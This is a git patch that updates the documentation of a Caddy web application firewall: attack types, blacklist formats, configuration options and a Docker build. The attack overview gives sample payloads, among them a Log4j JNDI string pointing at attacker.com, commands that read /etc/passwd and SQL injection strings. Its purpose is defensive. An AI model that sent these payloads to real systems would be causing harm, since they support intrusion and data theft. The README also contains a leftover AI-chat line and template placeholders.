From 21427cd555fb4d9e039c0fd839968ed98635c7a8 Mon Sep 17 00:00:00 2001 From: fabriziosalmi Date: Sun, 19 Jan 2025 18:58:27 +0100 Subject: [PATCH] docs updated. --- README.md | 18 +++- docs/README.md | 47 ++++++---- docs/attacks.md | 122 +++++++++++++++++++------ docs/blacklists.md | 70 +++++++++++---- docs/configuration.md | 42 ++++++--- docs/docker.md | 196 ++++++++++++++++++++++++++++++++++++++++- docs/dynamicupdates.md | 50 ++++++++++- docs/geoblocking.md | 7 -- docs/metrics.md | 171 ++++++++++++++++++++++++----------- docs/ratelimit.md | 72 +++++++++++++-- docs/rules.md | 159 ++++++++++++++++++++++----------- docs/scripts.md | 149 ++++++++++++++++++++++++------- docs/testing.md | 107 ++++++++++++++++++---- 13 files changed, 963 insertions(+), 247 deletions(-) diff --git a/README.md b/README.md index 0504413..1f9103a 100644 --- a/README.md +++ b/README.md @@ -1,3 +1,5 @@ +Okay, here's the updated `README.md` with the improved index, incorporating the file locations in `/docs` and making it more user-friendly: + # ๐Ÿ›ก๏ธ Caddy WAF Middleware A robust, highly customizable, and feature-rich **Web Application Firewall (WAF)** middleware for the Caddy web server. This middleware provides **advanced protection** against a comprehensive range of web-based threats, seamlessly integrating with Caddy and offering flexible configuration options to secure your applications effectively. @@ -137,7 +139,21 @@ Here's a minimal Caddyfile example to get started: For complete documentation, including configuration options, rule format details, protected attack types, testing strategies, and more, please refer to the `/docs` directory in this repository. -[Link to `/docs`](/docs/) +### ๐Ÿ“‘ Table of Contents + +1. [**Installation**](docs/installation.md) - *Instructions for installing the Caddy WAF middleware.* +2. [**Configuration Options**](docs/configuration.md) - *Detailed explanation of all available configuration settings.* +3. [**Rules Format (`rules.json`)**](docs/rules.md) - *A comprehensive guide to defining custom rules using the JSON format.* +4. [**Blacklist Formats**](docs/blacklists.md) - *Documentation of the formats used for defining IP and DNS blacklists.* +5. [**Rate Limiting**](docs/ratelimit.md) - *How to configure rate limiting, including parameters and usage.* +6. [**Country Blocking and Whitelisting**](docs/geoblocking.md) - *Details on how to configure country-based blocking and whitelisting.* +7. [**Protected Attack Types**](docs/attacks.md) - *An overview of the wide range of web-based threats that the Caddy WAF is designed to protect against.* +8. [**Dynamic Updates**](docs/dynamicupdates.md) - *How to dynamically update the WAF rules and other settings without downtime.* +9. [**Metrics**](docs/metrics.md) - *Details about the WAF's metrics endpoint and the different metrics collected.* +10. [**Prometheus Metrics**](docs/prometheus.md) - *Instructions on how to expose WAF metrics using the Prometheus format.* +11. [**Rule/Blacklist Population Scripts**](docs/scripts.md) - *Documentation on the provided scripts to automatically fetch, update and generate rules and blacklists.* +12. [**Testing**](docs/testing.md) - *Guidance on how to test the WAF's effectiveness using the provided testing tools.* +13. [**Docker Support**](docs/docker.md) - *Instructions on how to build and run the WAF using Docker.* --- diff --git a/docs/README.md b/docs/README.md index 0b843af..ff12a05 100644 --- a/docs/README.md +++ b/docs/README.md @@ -1,21 +1,36 @@ -# ๐Ÿ›ก๏ธ Caddy WAF Middleware +# ๐Ÿ›ก๏ธ Caddy WAF Middleware Documentation A robust, highly customizable, and feature-rich **Web Application Firewall (WAF)** middleware for the Caddy web server. This middleware provides **advanced protection** against a comprehensive range of web-based threats, seamlessly integrating with Caddy and offering flexible configuration options to secure your applications effectively. +This documentation provides everything you need to deploy and manage the Caddy WAF middleware effectively. + ## ๐Ÿ“‘ Table of Contents -1. * [Configuration Options](configuration.md) -2. * [Rules Format](rules.md) -3. * [Metrics](metrics.md) -4. * [Protected Attack Types](attacks.md) -5. * [Blacklist Formats](blacklists.md) -6. * [Rate Limiting](ratelimit.md) -7. * [Country Blocking and Whitelisting](geoblocking.md) -8. * [Dynamic Updates](dynamicupdates.md) -9. * [Testing](testing.md) -10. * [Docker Support](docker.md) -11. * [Rule/Blacklist Population Scripts](scripts.md) -12. * [Prometheus Metrics](prometheus.md) - - ---- +### ๐Ÿš€ Getting Started + +1. **[Introduction](introduction.md)** - *Overview of the Caddy WAF, its purpose, and key benefits.* (Optional - Add if you have an intro doc, otherwise this index page serves as intro) +2. **[Installation](installation.md)** - *Instructions for installing the Caddy WAF middleware.* (Optional - if you have an explicit installation document) + +### โš™๏ธ Core Configuration + +3. **[Configuration Options](configuration.md)** - *Detailed explanation of all available configuration settings, including how to set up the different options and settings of the WAF.* +4. **[Rules Format (`rules.json`)](rules.md)** - *A comprehensive guide to defining custom rules using the JSON format, with details about all the fields available and examples on how to use them.* +5. **[Blacklist Formats](blacklists.md)** - *Documentation of the formats used for defining IP and DNS blacklists, providing examples and guidelines for managing these files.* +6. **[Rate Limiting](ratelimit.md)** - *How to configure rate limiting, including parameters, usage and caveats.* +7. **[Country Blocking and Whitelisting](geoblocking.md)** - *Details on how to configure country-based blocking and whitelisting using the MaxMind GeoIP2 database, including how to obtain the necessary files.* + +### ๐Ÿ›ก๏ธ Security Features + +8. **[Protected Attack Types](attacks.md)** - *An overview of the wide range of web-based threats that the Caddy WAF is designed to protect against.* +9. **[Dynamic Updates](dynamicupdates.md)** - *How to dynamically update the WAF rules and other settings without downtime or restarting the Caddy server.* + +### ๐Ÿ“Š Monitoring and Management + +10. **[Metrics](metrics.md)** - *Details about the WAF's metrics endpoint and the different metrics collected, which provide insights into traffic patterns and WAF behavior, to help fine-tune the rules.* +11. **[Prometheus Metrics](prometheus.md)** - *Instructions on how to expose WAF metrics using the Prometheus format, for integration with your monitoring system.* +12. **[Rule/Blacklist Population Scripts](scripts.md)** - *Documentation on the provided scripts to automatically fetch, update and generate rules and blacklists from external resources.* + +### ๐Ÿงช Testing and Deployment + +13. **[Testing](testing.md)** - *Guidance on how to test the WAF's effectiveness using the provided testing tools, with different ways of testing the WAF functionality.* +14. **[Docker Support](docker.md)** - *Instructions on how to build and run the WAF using Docker, including best practices for containerized deployments.* diff --git a/docs/attacks.md b/docs/attacks.md index 19ada20..b8e02cd 100644 --- a/docs/attacks.md +++ b/docs/attacks.md @@ -1,27 +1,97 @@ -# ๐Ÿ›ก๏ธ Protected Attack Types +# ๐Ÿ›ก๏ธ Attacks -1. **SQL Injection (SQLi):** Detects and blocks attempts to inject malicious SQL code. -2. **Cross-Site Scripting (XSS):** Protects against the injection of malicious scripts into web pages. -3. **Path Traversal:** Blocks access to restricted files and directories through directory traversal techniques. -4. **Remote Code Execution (RCE):** Detects and prevents attempts to execute arbitrary commands on the server. -5. **Log4j Exploits:** Identifies and blocks Log4j vulnerability related attack patterns. -6. **Protocol Attacks:** Protects against attacks targeting sensitive protocol or configuration files. -7. **Scanner Detection:** Detects and blocks requests originating from known vulnerability scanners. -8. **Header & Cookie Injection:** Detects and blocks malicious content injected via headers and cookies. -9. **Insecure Deserialization:** Blocks requests with potentially malicious serialized data. -10. **HTTP Request Smuggling:** Prevents attacks that bypass security devices using inconsistent header combinations. -11. **HTTP Response Splitting:** Blocks attempts to inject malicious code through header manipulation. -12. **Insecure Direct Object Reference (IDOR):** Detects attempts to access resources using predictable object IDs. -13. **Server-Side Request Forgery (SSRF):** Prevents attacks that make the server perform unauthorized requests. -14. **XML External Entity (XXE) Injection:** Blocks attacks leveraging XML external entity processing. -15. **Server-Side Template Injection (SSTI):** Prevents code injection through template engines. -16. **Mass Assignment:** Blocks unauthorized modification of object attributes through uncontrolled input. -17. **NoSQL Injection:** Prevents malicious NoSQL queries designed to bypass authentication or steal data. -18. **XPath Injection:** Blocks attempts to manipulate XML documents with malicious XPath queries. -19. **LDAP Injection:** Detects and prevents the injection of malicious data into LDAP queries. -20. **XML Injection:** Detects various attacks exploiting XML manipulation. -21. **File Upload:** Blocks malicious file uploads to prevent execution of unwanted code. -22. **JWT Attacks:** Detects JWT tampering attempts and bypasses. -23. **GraphQL Injection:** Blocks attempts to perform unauthorized operations or extract data via GraphQL queries. -24. **Clickjacking:** Mitigates clickjacking attempts by preventing rendering the protected content inside a frame. -25. **Cross-Site Request Forgery (CSRF):** Blocks CSRF attacks by preventing unauthorized requests from being performed. +The WAF is designed to protect web applications against a wide array of attack vectors. It utilizes a combination of pattern matching, anomaly scoring, and other security mechanisms to detect and prevent these attacks. Here's a comprehensive overview of the attack types that the WAF is configured to protect against: + +1. **SQL Injection (SQLi):** + * **Description:** SQL Injection is a code injection technique used to attack data-driven applications, allowing malicious actors to interfere with the queries that an application makes to its database. Attackers can execute malicious SQL statements that could bypass authentication, access or modify sensitive data, or even gain control of the database server. + * **WAF Protection:** The WAF uses regular expressions and pattern matching to detect common SQL injection keywords and syntax within request parameters, headers, and body. It can detect attempts to manipulate SQL queries using techniques like UNION injections, comment bypasses, and others. + * **Example Attack:** `user' OR '1'='1'; --` +2. **Cross-Site Scripting (XSS):** + * **Description:** XSS attacks involve injecting malicious scripts (typically JavaScript) into web pages viewed by other users. These scripts can be used to steal session cookies, redirect users to malicious sites, or modify the content of a page in a way that tricks users. + * **WAF Protection:** The WAF scans for common XSS payloads within request headers, parameters, and the body, particularly within user-submitted content. It uses pattern matching to detect script tags, event handlers, and other potential XSS attack vectors. It can also detect XSS through encoded payloads. + * **Example Attack:** `` +3. **Path Traversal:** + * **Description:** Path traversal attacks exploit vulnerabilities that allow an attacker to access restricted files and directories on a web server by manipulating file paths in the request. This can lead to unauthorized access to configuration files, source code, or other sensitive information. + * **WAF Protection:** The WAF blocks requests containing path traversal sequences like `../` or `..\\`, which are commonly used to access files outside the web application's document root. It also scans for encoded path traversal sequences. + * **Example Attack:** `../../../../etc/passwd` +4. **Remote Code Execution (RCE):** + * **Description:** RCE attacks enable malicious actors to execute arbitrary code on a server. This can result from vulnerabilities in application software, operating systems, or other components. Attackers can use RCE to gain full control of a server, install malware, or steal sensitive data. + * **WAF Protection:** The WAF detects and blocks known RCE patterns including command injection attempts, and exploits of known vulnerabilities, by looking at command injection keywords in various parts of the request (headers, query parameters, body). + * **Example Attack:** `$(whoami)` or `| cat /etc/passwd` +5. **Log4j Exploits:** + * **Description:** The Log4j vulnerability (CVE-2021-44228) allows attackers to execute arbitrary code by injecting crafted input strings that are processed by the vulnerable Log4j library. + * **WAF Protection:** The WAF identifies and blocks common Log4j exploit patterns within the request body, query parameters, headers, and URI. The patterns look for specific strings that are used to exploit the vulnerability. + * **Example Attack:** `${jndi:ldap://attacker.com/evil}` +6. **Protocol Attacks:** + * **Description:** These are attacks that target sensitive protocol or configuration files like `.htaccess`, `.git`, or other private resources that should not be accessed directly through the web. + * **WAF Protection:** The WAF blocks access to these files and directories by using a rule that looks for known file names and path patterns. + * **Example Attack:** `/.git/config` or `/web.config` +7. **Scanner Detection:** + * **Description:** Vulnerability scanners are automated tools used to discover security issues in web applications. Malicious actors use these tools to probe systems for weaknesses and plan attacks. + * **WAF Protection:** The WAF identifies and blocks requests that are associated with known vulnerability scanners by looking for specific headers, user agent strings, and other characteristics. +8. **Header & Cookie Injection:** + * **Description:** Attackers attempt to inject malicious content through HTTP headers or cookies to manipulate application behavior or exploit vulnerabilities. This can be used to launch various types of attacks, like XSS or session hijacking. + * **WAF Protection:** The WAF inspects both request and response headers and cookies for malicious patterns, blocking any requests that contain suspicious data in these areas. + * **Example Attack:** Setting a cookie with a malicious Javascript payload. +9. **Insecure Deserialization:** + * **Description:** This attack occurs when an application deserializes data from an untrusted source, leading to arbitrary code execution if the data has been maliciously crafted. + * **WAF Protection:** The WAF detects requests with serialized data and blocks any known insecure deserialization payloads. + * **Example Attack:** Malicious serialized Java object. +10. **HTTP Request Smuggling:** + * **Description:** HTTP Request Smuggling involves crafting malicious HTTP requests that exploit discrepancies between how front-end proxies and back-end servers interpret requests. This can allow attackers to bypass security checks or access restricted resources. + * **WAF Protection:** The WAF can detect and block requests that contain suspicious header combinations that can be used for request smuggling attacks. +11. **HTTP Response Splitting:** + * **Description:** HTTP Response Splitting occurs when an attacker injects malicious data into the header of a response that causes the server to create additional HTTP responses, resulting in XSS or other attacks. + * **WAF Protection:** The WAF detects and blocks attempts to inject newline characters or other malicious content into HTTP response headers. +12. **Insecure Direct Object Reference (IDOR):** + * **Description:** IDOR vulnerabilities occur when an application exposes direct references to internal objects, allowing attackers to bypass authorization checks and access resources they should not have access to by using predictable identifiers. + * **WAF Protection:** The WAF detects attempts to access resources using sequential IDs or patterns associated with IDOR attacks. The WAF does not fully prevent these attacks as that would require knowing the valid identifiers, so it relies on generic patterns. + * **Example Attack:** Modifying a user ID in the URL to access another user's profile. +13. **Server-Side Request Forgery (SSRF):** + * **Description:** SSRF attacks enable a malicious actor to make requests from a server to internal resources, allowing them to bypass firewalls, access sensitive systems or data, and perform port scanning and information gathering. + * **WAF Protection:** The WAF blocks or flags requests that attempt to access internal resources or known sensitive ports by looking at the requested URL or domain. + * **Example Attack:** `http://localhost:8080/admin/users` or `http://127.0.0.1:3306` +14. **XML External Entity (XXE) Injection:** + * **Description:** XXE attacks occur when an attacker manipulates XML input to make an application access external resources. This can lead to information disclosure or denial-of-service attacks by reading local files or making connections to internal resources. + * **WAF Protection:** The WAF detects and blocks attempts to use external entities and other XML manipulation attempts. + * **Example Attack:** `]> ` +15. **Server-Side Template Injection (SSTI):** + * **Description:** SSTI attacks exploit template engines by injecting malicious template code that can be executed on the server, resulting in RCE and other malicious behavior. + * **WAF Protection:** The WAF detects patterns related to SSTI attacks, by looking for common template engine syntax within the request body or query parameters. + * **Example Attack:** `{{7*7}}` +16. **Mass Assignment:** + * **Description:** Mass assignment vulnerabilities occur when an application automatically binds user input directly to object attributes without proper sanitization. Attackers can exploit this by injecting malicious input to modify fields they should not have access to. + * **WAF Protection:** The WAF can detect and block attempts to manipulate attributes that should not be modified by analyzing request bodies. + * **Example Attack:** Adding a `is_admin: true` field to an object to elevate user privileges. +17. **NoSQL Injection:** + * **Description:** NoSQL injection is similar to SQL injection but targets NoSQL databases. Attackers can inject malicious NoSQL queries to bypass authentication, access or modify data, or perform other unwanted actions. + * **WAF Protection:** The WAF detects common NoSQL injection patterns using regular expressions. + * **Example Attack:** `{$where: '1==1'}` +18. **XPath Injection:** + * **Description:** XPath injection involves injecting malicious XPath queries to manipulate XML documents. Attackers can use this technique to access sensitive data within XML documents or perform unauthorized operations. + * **WAF Protection:** The WAF detects and blocks malicious XPath queries by looking for specific syntax patterns. + * **Example Attack:** `' or '1'='1'` +19. **LDAP Injection:** + * **Description:** LDAP injection is similar to SQL injection, but for LDAP queries, which can allow to bypass authentication or access information. + * **WAF Protection:** The WAF detects and blocks attempts to inject malicious content to manipulate LDAP queries. + * **Example Attack:** `(|(username=*)(password=*))` +20. **XML Injection:** + * **Description:** XML Injection attacks try to manipulate XML by injecting malicious content that can be used to cause a denial of service, bypass authentication or even execute code in the server. + * **WAF Protection:** The WAF has rules that detect different kinds of XML attacks including injection of malicious code. +21. **File Upload:** + * **Description:** This attack involves uploading malicious files to a web server that can be used to execute code or perform other malicious actions. + * **WAF Protection:** The WAF can detect and block attempts to upload files based on their extension, type or other characteristics. +22. **JWT Attacks:** + * **Description:** Attacks that try to manipulate JSON Web Tokens (JWT) to bypass authentication or impersonate users by tampering with the header, payload, or signature. + * **WAF Protection:** The WAF detects JWT tampering by validating and analyzing JWT tokens present in requests and looking for common bypass attempts. +23. **GraphQL Injection:** + * **Description:** GraphQL injection attacks exploit vulnerabilities in GraphQL APIs to execute unauthorized operations or retrieve sensitive data. Attackers can inject malicious queries, mutations, or fragments into GraphQL requests. + * **WAF Protection:** The WAF detects and blocks common patterns of GraphQL injection attempts. +24. **Clickjacking:** + * **Description:** Clickjacking is an attack technique where malicious actors trick users into clicking on a hidden element that is placed over a legitimate webpage. + * **WAF Protection:** The WAF has rules that mitigate Clickjacking attempts by adding headers to prevent the protected page to be rendered inside a frame. +25. **Cross-Site Request Forgery (CSRF):** + * **Description:** CSRF attacks force logged-in users to perform unwanted actions on a web application. The attacker tricks the user's browser into making a request to the server while the user is authenticated, without them being aware of it. + * **WAF Protection:** The WAF has rules that protect against CSRF attacks by checking for a CSRF token and by adding headers to prevent such attacks from being performed, if implemented in the application. + +By providing comprehensive protection against these common attack types, the WAF acts as a critical security layer for web applications. Regular updates of the WAF rules are essential to ensure continued protection against new and evolving threats. The protection mechanism is usually based on pattern matching, and you need to be aware that it will not always guarantee the full protection against all the variations of these types of attacks. diff --git a/docs/blacklists.md b/docs/blacklists.md index a6bcf34..d76e8c8 100644 --- a/docs/blacklists.md +++ b/docs/blacklists.md @@ -1,24 +1,62 @@ -# ๐Ÿšซ Blacklist Formats +# ๐Ÿšซ Blacklists + +This document outlines the formats used for various blacklists. These lists are utilized to identify and block potentially malicious or unwanted entities. Each list type has its own specific syntax and interpretation rules to ensure proper functionality. + +## General Considerations + +* **Case Sensitivity:** While DNS blacklist entries are explicitly lowercased, IP addresses are generally treated as case-insensitive. Any hostname or resource record included in an IP blacklist should be standardized in lowercase. +* **Line Handling:** Each entry must be on its own line. +* **Whitespace:** Leading and trailing whitespace should generally be ignored (trimmed) before processing each line, unless specifically defined otherwise. +* **Comments:** Lines beginning with `#` are considered comments and should be ignored by the processing logic. +* **Empty Lines:** Empty lines are permitted and should be skipped. +* **UTF-8 Encoding:** All blacklist files should be encoded using UTF-8 to ensure proper handling of international characters (in the rare case they appear in domain names) and avoid compatibility issues. +* **Error Handling:** Malformed entries should be logged or handled gracefully, with an option to skip them rather than halt the entire process. +* **Updates:** These lists may be automatically updated on a schedule. +* **Performance:** The chosen formats are designed to be easily parsed and matched against for efficient runtime operations. ## IP Blacklist (`ip_blacklist.txt`) -* Supports single IP addresses, CIDR ranges, and comments (lines starting with `#`). +* **Purpose:** To block network traffic originating from or destined for specified IP addresses or address ranges. +* **Format:** + * **Single IPv4 Addresses:** Standard dotted-decimal notation (e.g., `192.168.1.1`). + * **Single IPv6 Addresses:** Standard colon-separated hexadecimal notation (e.g., `2001:0db8:85a3:0000:0000:8a2e:0370:7334`, but also allows the shortened forms e.g., `2001:db8::7334`) + * **IPv4 CIDR Ranges:** Uses CIDR notation (e.g., `192.168.0.0/24`). Represents a contiguous block of IP addresses. + * **IPv6 CIDR Ranges:** Uses CIDR notation (e.g., `2001:db8::/32`). Represents a contiguous block of IPv6 addresses. + * **Comments:** Lines beginning with `#` are ignored. +* **Example:** -```text -192.168.1.1 -10.0.0.0/8 -2001:db8::/32 -# This is a comment -``` + ```text + 192.168.1.1 + 10.0.0.0/8 + 2001:db8::/32 + 2001:0db8:85a3:0000:0000:8a2e:0370:7334 + # This is a comment about a range + 172.16.0.0/12 # Private IP range + 172.16.1.250 + 2a02:2700::/32 + ``` +* **Matching Logic:** An IP address being checked will be matched against each entry. A match is successful if the address is: + * Identical to a single IP address listed. + * Within the range defined by a CIDR notation entry. +* **Implementation Notes:** A parser should validate entries against standard formats and potentially log invalid entries. Efficient data structures such as prefix trees (Tries) can enhance lookup performance, particularly with large lists. ## DNS Blacklist (`dns_blacklist.txt`) -* Contains one domain per line (comments are allowed with `#`). -* All entries are lowercased before matching. - -```text -malicious.com -evil.example.org -# This is a comment -``` +* **Purpose:** To block access to or from websites and services associated with specified domain names. +* **Format:** + * One fully qualified domain name (FQDN) per line. + * Comments are supported using `#`. + * All entries will be converted to lowercase before matching. + * Subdomains are not automatically included, unless explicit entries exist for them, and wildcard domains are not supported within these lists. + * Internationalized Domain Names (IDNs) must be stored as Punycode, following standard conventions (e.g., `xn--domain--432a.com`). +* **Example:** + ```text + malicious.com + evil.example.org + # Example of a comment + phishing-site.net + another.malware.com + xn--domain--432a.com + ``` +* **Matching Logic:** A hostname will be matched (in a case-insensitive manner once lowercased) against each entry in the list. A match occurs if the hostname being checked is *exactly* equal to an entry, e.g. `evil.example.org` would not match `sub.evil.example.org`. The matching should happen against the FQDN (Fully Qualified Domain Name). diff --git a/docs/configuration.md b/docs/configuration.md index e316b1d..66f84ac 100644 --- a/docs/configuration.md +++ b/docs/configuration.md @@ -1,18 +1,32 @@ -# โš™๏ธ Configuration Options +# โš™๏ธ Configuration + +The WAF provides a variety of configuration options to control its behavior, allowing for precise customization of security policies. These options are typically set within the WAF's configuration file (e.g., Caddyfile). The following table describes each option in detail: | Option | Description | Example | |------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------| -| `anomaly_threshold` | Sets the anomaly score threshold at which requests will be blocked. | `anomaly_threshold 20` | -| `rule_file` | Path to a JSON file containing the WAF rules. | `rule_file rules.json` | -| `ip_blacklist_file` | Path to a file containing blacklisted IP addresses and CIDR ranges. | `ip_blacklist_file blacklist.txt` | -| `dns_blacklist_file` | Path to a file containing blacklisted domain names. | `dns_blacklist_file domains.txt` | -| `rate_limit` | Configures the rate limiting parameters. The syntax is `requests`, `window`, and optional `cleanup_interval`. Use `paths` to set specific paths to rate limit, and `match_all_paths` to specify if only matching paths should be rate limited (`false`), or all paths except matching should be rate limited (`true`). | `rate_limit { requests 100 window 1m cleanup_interval 5m paths /api/v1/.* /admin/.* match_all_paths false }` | -| `block_countries` | Enables country blocking, requires the GeoIP database path and ISO country codes. | `block_countries GeoLite2-Country.mmdb RU CN KP` | -| `whitelist_countries` | Enables country whitelisting, requires the GeoIP database path and ISO country codes. | `whitelist_countries GeoLite2-Country.mmdb US` | -| `log_severity` | Sets the minimum logging level (`debug`, `info`, `warn`, `error`). | `log_severity debug` | -| `log_json` | Enables JSON formatted log output. | `log_json` | -| `log_path` | Sets the path for the log file. If not specified, it will default to `/var/log/caddy/waf.json`. | `log_path debug.json` | -| `redact_sensitive_data` | When enabled, it will redact sensitive data from the query string on the logs. | `redact_sensitive_data` | -| `custom_response` | Defines a custom response for the specified status code, following the syntax `custom_response STATUS_CODE content_type body_string_or_file_path`. Can load from a file or use a plain text string as response. | `custom_response 403 application/json error.json` or `custom_response 403 text/html "

Access Denied

"` | -``` +| **`anomaly_threshold`** | **Anomaly Score Threshold:** This option sets the numerical threshold for the WAF's anomaly score. When the accumulated score for a request, calculated from rule hits, exceeds this value, the request is blocked. This parameter allows for blocking of traffic that triggers multiple rules and exceeds a total risk score. A lower threshold will cause the WAF to block requests with a lower overall score, while a higher threshold will only block requests that trigger more rules or rules with a high `score` value. | `anomaly_threshold 20`, `anomaly_threshold 10`, `anomaly_threshold 50` | +| **`rule_file`** | **Path to Rules File:** Specifies the path to the JSON file (`rules.json`) containing the WAF's ruleset. The WAF reads and parses this file to determine which requests to block or log. It is a critical option as the WAF won't work without this file configured. The file path can be relative or absolute. | `rule_file rules.json`, `rule_file /etc/waf/custom_rules.json` | +| **`ip_blacklist_file`** | **Path to IP Blacklist File:** Defines the path to the text file containing the list of blacklisted IP addresses and CIDR ranges. The WAF will block any requests originating from an IP address or range listed in this file. The file path can be relative or absolute. The file format must adhere to the format specified in the documentation for this functionality. | `ip_blacklist_file blacklist.txt`, `ip_blacklist_file /opt/waf/bad_ips.txt` | +| **`dns_blacklist_file`** | **Path to DNS Blacklist File:** Specifies the path to the text file containing a list of blacklisted domain names (one per line). The WAF will block or log any request that includes a domain name matching an entry in this list, often used to block requests to or from known malicious sites. The file path can be relative or absolute. The file format must adhere to the format specified in the documentation for this functionality. | `dns_blacklist_file domains.txt`, `dns_blacklist_file /var/waf/bad_domains.txt` | +| **`rate_limit`** | **Rate Limiting Configuration:** Enables and configures rate limiting for incoming requests. It requires a block of parameters containing rate limiting options (`requests`, `window`, and `cleanup_interval`), as well as the `paths` that will be affected by the rate limiting. `match_all_paths` specifies if only matching paths should be rate limited or if all paths except the matching paths should be rate limited. Refer to the documentation for the correct syntax for the rate limiting configuration. | `rate_limit { requests 100 window 1m cleanup_interval 5m paths /api/v1/.* /admin/.* match_all_paths false }`,
`rate_limit { requests 50 window 10s cleanup_interval 1m }`,
`rate_limit { requests 200 window 30s cleanup_interval 10m paths /public/.* match_all_paths true}` | +| **`block_countries`** | **Country Blocking:** Enables the blocking of requests based on their originating country. It requires the path to the MaxMind GeoIP2 database (`GeoLite2-Country.mmdb`) and a list of ISO country codes to block. Requests from these specified countries will be blocked. This parameter must specify the full path to the `GeoLite2-Country.mmdb` file to work correctly. | `block_countries GeoLite2-Country.mmdb RU CN KP`,
`block_countries /opt/waf/GeoLite2-Country.mmdb BR IR` | +| **`whitelist_countries`** | **Country Whitelisting:** Enables the whitelisting of requests based on their originating country. It requires the path to the MaxMind GeoIP2 database (`GeoLite2-Country.mmdb`) and a list of ISO country codes to whitelist. Requests from any country that is *not* in this whitelist will be blocked. Only one of `block_countries` or `whitelist_countries` can be active at the same time. This parameter must specify the full path to the `GeoLite2-Country.mmdb` file to work correctly. | `whitelist_countries GeoLite2-Country.mmdb US`, `whitelist_countries /etc/waf/GeoLite2-Country.mmdb CA UK AU` | +| **`log_severity`** | **Minimum Logging Level:** Sets the minimum severity level for log messages. Only messages at or above this level will be included in the logs. This option is useful for controlling the volume of log output and focusing on more important events. Supported levels (in increasing severity) are: `debug`, `info`, `warn`, and `error`. | `log_severity debug`, `log_severity info`, `log_severity warn`, `log_severity error` | +| **`log_json`** | **JSON Log Output:** Enables the use of JSON format for log messages. This can help with parsing the log messages with external tools and services. If enabled, the logs will be formatted as JSON objects; otherwise they will be in plain text. | `log_json` | +| **`log_path`** | **Log File Path:** Specifies the path for the WAF log file. This is where the WAF will output its log messages. If this option is not configured, logs will be directed to a default path (e.g., `/var/log/caddy/waf.json` or to the standard output). The file path can be relative or absolute, but the directory must exist. | `log_path debug.json`, `log_path /var/log/waf/access.log`, `log_path ./waf.log` | +| **`redact_sensitive_data`** | **Query String Data Redaction:** When enabled, this option redacts potentially sensitive data from the request query string in log messages. This is important for compliance with privacy regulations and preventing exposure of sensitive information in logs. Query string data can include credentials, personally identifiable information or other private information. | `redact_sensitive_data` | +| **`custom_response`** | **Custom Error Responses:** This powerful option allows for defining custom HTTP responses to send when a request is blocked, or any other situation where a custom response is desirable. It requires three parameters: the HTTP status code for the response, the response `content_type`, and a text string or path to the response content. You can either include the content directly in the configuration, or specify a path to a file containing the content, allowing custom responses to be as simple or complex as required. If a file path is specified, it will load the file content on WAF startup and use it as the response body. | `custom_response 403 application/json error.json`, `custom_response 404 text/plain "Not Found"`, `custom_response 401 text/html /opt/waf/unauthorized.html`, `custom_response 429 text/plain "Too Many Requests"` | + +### Important Considerations: + +* **Mutual Exclusivity:** Note that some options are mutually exclusive (e.g., `block_countries` and `whitelist_countries`); only one of them can be active at the same time. +* **File Paths:** When specifying file paths (e.g., `rule_file`, `ip_blacklist_file`, `dns_blacklist_file`, and `log_path`), ensure that the WAF process has the correct permissions to read those files and write to those directories, where applicable. +* **Option precedence:** Some configurations will take precedence if there is a conflict. E.g. rate limiting could be configured, and a rule could block that specific request before the rate limiter is triggered, or vice versa. +* **Validation:** Be sure that the configuration is valid by testing the configuration and reviewing any errors that might appear on startup. +* **Defaults:** Be sure to be aware of the default values of the parameters to ensure they fit your requirements. +* **Error messages:** Error messages should be descriptive and point to what could be the issue with the current configuration, like non-existing files or invalid formats. +* **Logging:** Logging is important to troubleshoot any issues with the configuration. +* **Security:** Secure access to the configuration and log files to prevent unauthorized modifications and information leaks. +* **Dynamic Changes:** Changes to the configuration will usually require restarting the service to pick up the new settings. +By carefully configuring these options, you can tailor the WAF's behavior to meet your specific security requirements, balancing protection with performance. Thorough testing after making configuration changes is a must to be sure the WAF is working as expected. This fine-grained level of control ensures that the WAF can act as an effective security layer for your web application. diff --git a/docs/docker.md b/docs/docker.md index ce11e12..e7e3bd4 100644 --- a/docs/docker.md +++ b/docs/docker.md @@ -1,12 +1,200 @@ -# ๐Ÿณ Docker Support +# ๐Ÿณ Docker -Build and run a Docker container: +Docker provides a powerful and efficient way to package and run the WAF as a containerized application. This approach offers numerous advantages, including portability, consistency, simplified deployment, and scalability. This section provides comprehensive information on building and running the WAF within Docker containers, following industry best practices. + +## Building the Docker Image + +The Docker image is built using the `docker build` command, executed from the project's root directory (where the `Dockerfile` is located): ```bash -# Build the Docker image docker build -t caddy-waf . +``` + +* **`docker build`**: This is the Docker command to build an image from a `Dockerfile`. +* **`-t caddy-waf`**: The `-t` flag tags the built image with the name `caddy-waf`. This tag is used later to reference the image when running containers. You can replace `caddy-waf` with your preferred image name and tag. It is recommended to prefix the image name with the registry, if you are deploying to registries other than Docker Hub, for example: `myregistry/caddy-waf`. +* **.**: The trailing dot (`.`) specifies that the build context is the current directory, where the `Dockerfile` and other necessary files are found. + +**Dockerfile Deep Dive:** + +The `Dockerfile` is responsible for defining how the Docker image is built. It should: + +* Start with a suitable base image. We use a multi-stage build, using `golang:1.22.3-alpine` as the builder image and `alpine:latest` as the final image. +* Install necessary tools for building: `git` (for cloning the repository) and `wget` (for downloading files), as well as `xcaddy` which is used to compile a custom version of `caddy`. +* Clone the WAF's Git repository. +* Fetch and install Go dependencies, including the required Caddy modules, the WAF plugin, and other modules. +* Download the GeoLite2 Country database. +* Build the Caddy binary with the WAF plugin using `xcaddy`. +* Copy the compiled Caddy binary, GeoIP database, configuration files (rules, blacklists, Caddyfile) into the final image. +* Create a non-root user (`caddy`) for security. +* Set appropriate permissions for the files inside the container. +* Expose the required HTTP port (default is `8080`). +* Define the command to execute when the container starts, which is to run Caddy using the specified Caddyfile. + +Here's the complete Dockerfile shipped with the project, along with inline comments: + +```dockerfile +# --- Stage 1: Builder Stage --- +# Use a Go base image to build the Caddy binary and the WAF module +FROM golang:1.22.3-alpine AS builder + +# Install essential tools for building: git, wget +# - git: required for cloning the repository +# - wget: required for downloading files +# - &&: combines commands +# - no-cache: prevents the apk installer from using the cache (smaller image) +RUN apk add --no-cache git wget + +# Install xcaddy for building custom Caddy binaries with modules. +# - @latest will install the latest available version. +RUN go install github.com/caddyserver/xcaddy/cmd/xcaddy@latest + +# Set the working directory for the build process +WORKDIR /app + +# Clone the caddy-waf repository from GitHub +RUN git clone https://github.com/fabriziosalmi/caddy-waf.git + +# Change to the cloned directory 